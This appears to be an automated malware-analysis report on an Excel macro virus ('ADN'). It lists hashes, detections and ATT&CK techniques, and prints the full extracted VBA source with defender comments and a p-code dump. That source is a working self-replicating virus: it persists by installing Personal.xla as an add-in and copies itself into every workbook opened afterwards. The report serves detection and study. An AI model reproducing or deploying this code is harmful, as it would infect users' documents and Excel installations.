Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bd938e55ac48d3b9…

MALICIOUS

Office (OLE)

23.5 KB Created: 2000-12-06 20:55:44 Authoring application: Microsoft Excel First seen: 2015-10-03
MD5: d9b38ef2c081c2cf0379768df9bf52d0 SHA-1: fac3f809e0e15e7a9820a5dfd018168b16753570 SHA-256: bd938e55ac48d3b91ebcaa4f9a512ceaf65a5cb976b85bf9dd852abc4fbe1417
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing VBA macros, including an Auto_Open macro, a common technique for executing malicious code when the document is opened. The script attempts to save a component as 'Personal.xla' in the application's path, which suggests a payload-delivery or persistence mechanism. The ClamAV detections further confirm its malicious nature.

Heuristics 3

  • ClamAV: Xls.Trojan.Adn-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Adn-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8424 bytes
SHA-256: fa6e64050c2a3ee863ffcedd660d8265e6bc2c355d59f1753ecdbfb694e5ef15
Detection
ClamAV: Xls.Trojan.Adn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Document module "ThisWorkbook": only module attributes appear in the extracted
' source for this stream (no procedure bodies are shown in the preview).
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Worksheet module "Hoja1": attributes only, as above.
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Standard module "X316": this is the module holding the macro code below.
' Its name (one letter followed by a number) is the pattern auto_open searches
' for, so the viral module can find itself regardless of the name it was given.
Attribute VB_Name = "X316"
' Spalaci Label is Pac
' ADN Virus - (C) Copyright 1999/2000
' Module-level state: auto_open stores the name of the matching module here and
' ClassModulo reads it when exporting/importing that module.
Public Indexe As String

' Auto_Open entry point: Excel runs this when the workbook is opened.
' It does two things: (1) locate the module whose name is a single letter
' followed by a number and remember it in Indexe, and (2) hook the
' application-wide OnSheetActivate event so ClassModulo (the infection
' routine) runs whenever a sheet is activated.
Private Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
For i = 1 To ThisWorkbook.VBProject.VBComponents.Count
    Cadena = ThisWorkbook.VBProject.VBComponents(i).Name
    ' Split the name into its first character and the remainder.
    Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
    ' Rebuild "<letter><number>"; the name only matches if the remainder is a
    ' plain number (e.g. "X316" matches, "Hoja1" does not since Val("oja1") = 0).
    Fusion = (Letras & Val(Numero))
    If Cadena = Fusion Then
       Indexe = ThisWorkbook.VBProject.VBComponents(i).Name
    End If
Next
' Legacy application-level event hook; the string names the handler procedure.
' Detection note: this property being set from document code is itself a
' useful indicator.
Application.OnSheetActivate = "ClassModulo"
End Sub

' Infection routine, invoked via the OnSheetActivate hook set in auto_open.
' Two branches:
'   - Running from a normal document: create Personal.xla in Excel's program
'     folder (Application.Path), copy the viral module into it, and register
'     it as an installed add-in (persistence).
'   - Running from Personal.xla: copy the viral module into the active
'     workbook if it is not already infected (propagation).
' Finally, a low-probability cosmetic payload changes the Excel caption.
' Indicators for defenders: an unexpected Personal.xla in Application.Path,
' a newly installed add-in, modules named "<letter><number>", and the
' application title "Spalaci.Label.Is.Pac".
Private Sub ClassModulo()
Attribute ClassModulo.VB_ProcData.VB_Invoke_Func = " \n14"
    ' install = 1 means "already present, do nothing" in both branches below.
    Randomize: install = 0
    ' Suppress Excel prompts (e.g. from SaveAs) and redraw while the copy runs.
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    ' Random module name: Intr is 1..1000, Iltr is 65..90 so Chr(Iltr) is
    ' "A".."Z"; Play therefore follows the "<letter><number>" pattern that
    ' auto_open searches for.
    Intr = Int((Rnd * 1000) + 1)
    Iltr = Int((90 - 65 + 1) * Rnd + 65)
    Play = (Chr(Iltr) & Intr)
    If ThisWorkbook.Name <> "Personal.xla" Then
       ' Branch 1: running from a document. Skip if the add-in already exists.
       If Dir(Application.Path + "\Personal.xla") = "Personal.xla" Then install = 1
       If install = 0 Then
          Workbooks.Add.SaveAs FileName:=Application.Path + "\Personal.xla"
          ' Export writes the module source to a file whose path is the module
          ' name (Indexe); presumably relative to Excel's current directory -
          ' TODO confirm. That file is then imported into the new add-in.
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents.Import (Indexe)
          Workbooks("Personal.xla").VBProject.VBComponents(Indexe).Name = Play
          Workbooks("Personal.xla").IsAddin = True
          Workbooks("Personal.xla").Save
          ' Registers and installs the add-in so Excel loads it on later starts.
          AddIns.Add(Application.Path + "\Personal.xla").Installed = True
       End If
    Else
       ' Branch 2: running from Personal.xla. Scan the active workbook for a
       ' module already named "<letter><number>" (same test as auto_open).
       For i = 1 To ActiveWorkbook.VBProject.VBComponents.Count
           Cadena = ActiveWorkbook.VBProject.VBComponents(i).Name
           Letras = Left(Cadena, 1): Numero = Right(Cadena, (Len(Cadena) - 1))
           Fusion = (Letras & Val(Numero))
           If Cadena = Fusion Then install = 1
       Next
       If install = 0 Then
          ' Not yet infected: copy the module from the add-in into the active
          ' workbook under the random name.
          ThisWorkbook.VBProject.VBComponents(Indexe).Export (Indexe)
          ActiveWorkbook.VBProject.VBComponents.Import (Indexe)
          ActiveWorkbook.VBProject.VBComponents(Indexe).Name = Play
       End If
    End If
    ' Payload trigger: compares today's day-of-month with a random 1..31, so it
    ' fires on roughly one run in 31.
    If Day(Now()) = Int((31 * Rnd) + 1) Then
       Application.Caption = "Spalaci.Label.Is.Pac"
       Application.CommandBars.LargeButtons = True
    End If
    ' Restore the UI settings changed at the top of the routine.
    Application.DisplayAlerts = True
    Application.ScreenUpdating = True
End Sub


' Processing file: /opt/analyzer/scan_staging/4567d078a06f417183f1cc48322cc47d.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 965 bytes
' _VBA_PROJECT_CUR/VBA/Hoja1 - 956 bytes
' _VBA_PROJECT_CUR/VBA/X316 - 3847 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0015 " Spalaci Label is Pac"
' Line #1:
' 	QuoteRem 0x0000 0x0024 " ADN Virus - (C) Copyright 1999/2000"
' Line #2:
' 	Dim (Public) 
' 	VarDefn Indexe (As String)
' Line #3:
' Line #4:
' 	FuncDefn (Private Sub auto_open())
' Line #5:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #6:
' 	Ld i 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Cadena 
' Line #7:
' 	Ld Cadena 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	St Letras 
' 	BoS 0x0000 
' 	Ld Cadena 
' 	Ld Cadena 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Right 0x0002 
' 	St Numero 
' Line #8:
' 	Ld Letras 
' 	Ld Numero 
' 	ArgsLd Val 0x0001 
' 	Concat 
' 	Paren 
' 	St Fusion 
' Line #9:
' 	Ld Cadena 
' 	Ld Fusion 
' 	Eq 
' 	IfBlock 
' Line #10:
' 	Ld i 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Indexe 
' Line #11:
' 	EndIfBlock 
' Line #12:
' 	StartForVariable 
' 	Next 
' Line #13:
' 	LitStr 0x000B "ClassModulo"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #14:
' 	EndSub 
' Line #15:
' Line #16:
' 	FuncDefn (Private Sub ClassModulo())
' Line #17:
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	LitDI2 0x0000 
' 	St install 
' Line #18:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #19:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #20:
' 	Ld Rnd 
' 	LitDI2 0x03E8 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	St Intr 
' Line #21:
' 	LitDI2 0x005A 
' 	LitDI2 0x0041 
' 	Sub 
' 	LitDI2 0x0001 
' 	Add 
' 	Paren 
' 	Ld Rnd 
' 	Mul 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	St Iltr 
' Line #22:
' 	Ld Iltr 
' 	ArgsLd Chr 0x0001 
' 	Ld Intr 
' 	Concat 
' 	Paren 
' 	St Play 
' Line #23:
' 	Ld ThisWorkbook 
' 	MemLd New 
' 	LitStr 0x000C "Personal.xla"
' 	Ne 
' 	IfBlock 
' Line #24:
' 	Ld Application 
' 	MemLd Path 
' 	LitStr 0x000D "\Personal.xla"
' 	Add 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x000C "Personal.xla"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St install 
' 	EndIf 
' Line #25:
' 	Ld install 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #26:
' 	Ld Application 
' 	MemLd Path 
' 	LitStr 0x000D "\Personal.xla"
' 	Add 
' 	ParamNamed FileName 
' 	Ld Workbooks 
' 	MemLd Add 
' 	ArgsMemCall SaveAs 0x0001 
' Line #27:
' 	Ld Indexe 
' 	Paren 
' 	Ld Indexe 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #28:
' 	Ld Indexe 
' 	Paren 
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #29:
' 	Ld Play 
' 	Ld Indexe 
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemSt New 
' Line #30:
' 	LitVarSpecial (True)
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	MemSt IsAddin 
' Line #31:
' 	LitStr 0x000C "Personal.xla"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemCall Save 0x0000 
' Line #32:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemLd Path 
' 	LitStr 0x000D "\Personal.xla"
' 	Add 
' 	Ld AddIns 
' 	ArgsMemLd Add 0x0001 
' 	MemSt Installed 
' Line #33:
' 	EndIfBlock 
' Line #34:
' 	ElseBlock 
' Line #35:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	For 
' Line #36:
' 	Ld i 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	St Cadena 
' Line #37:
' 	Ld Cadena 
' 	LitDI2 0x0001 
' 	ArgsLd LBound 0x0002 
' 	St Letras 
' 	BoS 0x0000 
' 	Ld Cadena 
' 	Ld Cadena 
' 	FnLen 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	ArgsLd Right 0x0002 
' 	St Numero 
' Line #38:
' 	Ld Letras 
' 	Ld Numero 
' 	ArgsLd Val 0x0001 
' 	Concat 
' 	Paren 
' 	St Fusion 
' Line #39:
' 	Ld Cadena 
' 	Ld Fusion 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St install 
' 	EndIf 
' Line #40:
' 	StartForVariable 
' 	Next 
' Line #41:
' 	Ld install 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #42:
' 	Ld Indexe 
' 	Paren 
' 	Ld Indexe 
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #43:
' 	Ld Indexe 
' 	Paren 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #44:
' 	Ld Play 
' 	Ld Indexe 
' 	Ld ActiveWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemSt New 
' Line #45:
' 	EndIfBlock 
' Line #46:
' 	EndIfBlock 
' Line #47:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x001F 
' 	Ld Rnd 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	Eq 
' 	IfBlock 
' Line #48:
' 	LitStr 0x0014 "Spalaci.Label.Is.Pac"
' 	Ld Application 
' 	MemSt Caption 
' Line #49:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemLd CommandBars 
' 	MemSt LargeButtons 
' Line #50:
' 	EndIfBlock 
' Line #51:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #52:
' 	LitVarSpecial (True)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #53:
' 	EndSub 
' Line #54: